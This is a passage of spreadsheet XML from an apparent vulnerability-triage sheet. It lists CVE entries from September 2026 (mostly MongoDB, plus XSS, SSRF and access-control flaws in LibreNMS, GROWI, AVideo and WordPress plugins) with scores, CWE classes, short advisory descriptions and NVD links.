          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t>
        </is>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D1286" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1286" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1286" s="5" t="inlineStr"/>
      <c r="H1286" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1286" s="5" t="inlineStr"/>
      <c r="J1286" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1286" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1286" s="5" t="inlineStr"/>
      <c r="M1286" s="5" t="inlineStr"/>
      <c r="N1286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1286" s="5" t="inlineStr"/>
      <c r="Q1286" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R1286"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S1286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D1287" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1287" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1287" s="5" t="inlineStr"/>
      <c r="H1287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1287" s="5" t="inlineStr"/>
      <c r="J1287" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1287" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1287" s="5" t="inlineStr"/>
      <c r="M1287" s="5" t="inlineStr"/>
      <c r="N1287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1287" s="5" t="inlineStr"/>
      <c r="Q1287" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1287"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S1287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D1288" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1288" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1288" s="5" t="inlineStr"/>
      <c r="H1288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1288" s="5" t="inlineStr"/>
      <c r="J1288" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1288" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1288" s="5" t="inlineStr"/>
      <c r="M1288" s="5" t="inlineStr"/>
      <c r="N1288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1288" s="5" t="inlineStr"/>
      <c r="Q1288" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1288"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S1288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D1289" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1289" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1289" s="5" t="inlineStr"/>
      <c r="H1289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1289" s="5" t="inlineStr"/>
      <c r="J1289" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1289" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1289" s="5" t="inlineStr"/>
      <c r="M1289" s="5" t="inlineStr"/>
      <c r="N1289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1289" s="5" t="inlineStr"/>
      <c r="Q1289" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1289"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S1289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D1290" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1290" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1290" s="5" t="inlineStr"/>
      <c r="H1290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1290" s="5" t="inlineStr"/>
      <c r="J1290" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1290" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1290" s="5" t="inlineStr"/>
      <c r="M1290" s="5" t="inlineStr"/>
      <c r="N1290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1290" s="5" t="inlineStr"/>
      <c r="Q1290" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1290"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S1290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D1291" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1291" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1291" s="5" t="inlineStr"/>
      <c r="H1291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1291" s="5" t="inlineStr"/>
      <c r="J1291" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1291" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1291" s="5" t="inlineStr"/>
      <c r="M1291" s="5" t="inlineStr"/>
      <c r="N1291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1291" s="5" t="inlineStr"/>
      <c r="Q1291" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R1291"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S1291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D1292" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1292" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1292" s="5" t="inlineStr"/>
      <c r="H1292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1292" s="5" t="inlineStr"/>
      <c r="J1292" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1292" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1292" s="5" t="inlineStr"/>
      <c r="M1292" s="5" t="inlineStr"/>
      <c r="N1292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1292" s="5" t="inlineStr"/>
      <c r="Q1292" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R1292"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S1292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D1293" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1293" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1293" s="5" t="inlineStr"/>
      <c r="H1293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1293" s="5" t="inlineStr"/>
      <c r="J1293" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1293" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1293" s="5" t="inlineStr"/>
      <c r="M1293" s="5" t="inlineStr"/>
      <c r="N1293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1293" s="5" t="inlineStr"/>
      <c r="Q1293" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1293"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S1293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D1294" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1294" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1294" s="5" t="inlineStr"/>
      <c r="H1294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1294" s="5" t="inlineStr"/>
      <c r="J1294" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1294" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1294" s="5" t="inlineStr"/>
      <c r="M1294" s="5" t="inlineStr"/>
      <c r="N1294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1294" s="5" t="inlineStr"/>
      <c r="Q1294" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1294"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S1294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D1295" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1295" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1295" s="5" t="inlineStr"/>
      <c r="H1295" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1295" s="5" t="inlineStr"/>
      <c r="J1295" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1295" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1295" s="5" t="inlineStr"/>
      <c r="M1295" s="5" t="inlineStr"/>
      <c r="N1295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1295" s="5" t="inlineStr"/>
      <c r="Q1295" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1295"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S1295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="D1296" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1296" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1296" s="5" t="inlineStr"/>
      <c r="H1296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1296" s="5" t="inlineStr"/>
      <c r="J1296" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1296" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1296" s="5" t="inlineStr"/>
      <c r="M1296" s="5" t="inlineStr"/>
      <c r="N1296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1296" s="5" t="inlineStr"/>
      <c r="Q1296" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1296"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S1296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1297" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84192</t>
        </is>
      </c>
      <c r="D1297" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1297" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1297" s="5" t="inlineStr"/>
      <c r="H1297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1297" s="5" t="inlineStr"/>
      <c r="J1297" s="5" t="inlineStr"/>
      <c r="K1297" s="5" t="inlineStr"/>
      <c r="L1297" s="5" t="inlineStr"/>
      <c r="M1297" s="5" t="inlineStr"/>
      <c r="N1297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1297" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1297" s="5" t="inlineStr"/>
      <c r="Q1297" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1297" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.3.1 contains a stored cross-site scripting vulnerability in legacy PHP templates that output SNMP-sourced and syslog-sourced data without escaping. An attacker who controls a monitored network device can inject arbitrary JavaScript through SNMP interface descriptions or syslog program fields that executes when authenticated users view affected pages.</t>
        </is>
      </c>
      <c r="S1297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84192</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1298" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84205</t>
        </is>
      </c>
      <c r="D1298" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1298" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1298" s="5" t="inlineStr"/>
      <c r="H1298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1298" s="5" t="inlineStr"/>
      <c r="J1298" s="5" t="inlineStr"/>
      <c r="K1298" s="5" t="inlineStr"/>
      <c r="L1298" s="5" t="inlineStr"/>
      <c r="M1298" s="5" t="inlineStr"/>
      <c r="N1298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1298" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1298" s="5" t="inlineStr"/>
      <c r="Q1298" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1298" s="5" t="inlineStr">
        <is>
          <t>GROWI contains an access control vulnerability in the GET /_api/v3/revisions/:id endpoint that validates access against a query parameter but returns the revision identified by the path parameter without confirming they reference the same page. Authenticated attackers can pair a page identifier they can access with an arbitrary revision identifier to read revision content from pages they lack permission to view.</t>
        </is>
      </c>
      <c r="S1298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84205</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84817</t>
        </is>
      </c>
      <c r="D1299" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1299" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1299" s="5" t="inlineStr"/>
      <c r="H1299" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1299" s="5" t="inlineStr"/>
      <c r="J1299" s="5" t="inlineStr"/>
      <c r="K1299" s="5" t="inlineStr"/>
      <c r="L1299" s="5" t="inlineStr"/>
      <c r="M1299" s="5" t="inlineStr"/>
      <c r="N1299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1299" s="5" t="inlineStr"/>
      <c r="Q1299" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1299" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t>
        </is>
      </c>
      <c r="S1299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84818</t>
        </is>
      </c>
      <c r="D1300" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1300" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1300" s="5" t="inlineStr"/>
      <c r="H1300" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1300" s="5" t="inlineStr"/>
      <c r="J1300" s="5" t="inlineStr"/>
      <c r="K1300" s="5" t="inlineStr"/>
      <c r="L1300" s="5" t="inlineStr"/>
      <c r="M1300" s="5" t="inlineStr"/>
      <c r="N1300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1300" s="5" t="inlineStr"/>
      <c r="Q1300" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1300" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t>
        </is>
      </c>
      <c r="S1300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84820</t>
        </is>
      </c>
      <c r="D1301" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1301" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1301" s="5" t="inlineStr"/>
      <c r="H1301" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1301" s="5" t="inlineStr"/>
      <c r="J1301" s="5" t="inlineStr"/>
      <c r="K1301" s="5" t="inlineStr"/>
      <c r="L1301" s="5" t="inlineStr"/>
      <c r="M1301" s="5" t="inlineStr"/>
      <c r="N1301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1301" s="5" t="inlineStr"/>
      <c r="Q1301" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1301" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t>
        </is>
      </c>
      <c r="S1301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1302" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85163</t>
        </is>
      </c>
      <c r="D1302" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1302" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1302" s="5" t="inlineStr"/>
      <c r="H1302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1302" s="5" t="inlineStr"/>
      <c r="J1302" s="5" t="inlineStr"/>
      <c r="K1302" s="5" t="inlineStr"/>
      <c r="L1302" s="5" t="inlineStr"/>
      <c r="M1302" s="5" t="inlineStr"/>
      <c r="N1302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1302" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1302" s="5" t="inlineStr"/>
      <c r="Q1302" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1302" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a server-side request forgery vulnerability in the EPG parser that allows authenticated uploaders to fetch arbitrary internal URLs. An attacker can supply an internal URL via the epg_link parameter during video upload, which is validated only for syntax and later fetched server-side during EPG generation without SSRF protection checks.</t>
        </is>
      </c>
      <c r="S1302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85163</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1303" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85164</t>
        </is>
      </c>
      <c r="D1303" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1303" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1303" s="5" t="inlineStr"/>
      <c r="H1303" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1303" s="5" t="inlineStr"/>
      <c r="J1303" s="5" t="inlineStr"/>
      <c r="K1303" s="5" t="inlineStr"/>
      <c r="L1303" s="5" t="inlineStr"/>
      <c r="M1303" s="5" t="inlineStr"/>
      <c r="N1303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1303" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1303" s="5" t="inlineStr"/>
      <c r="Q1303" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1303" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c91b5975d contains a server-side request forgery vulnerability in the set_api_userImages API endpoint that fails to validate profileImg and backgroundImg URLs before fetching them. Authenticated API clients can supply internal URLs to fetch cloud metadata or internal services, with responses written to publicly accessible web paths for retrieval.</t>
        </is>
      </c>
      <c r="S1303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85164</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1304" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85170</t>
        </is>
      </c>
      <c r="D1304" s="5" t="n">
        <v>7.1</v>
      </c>
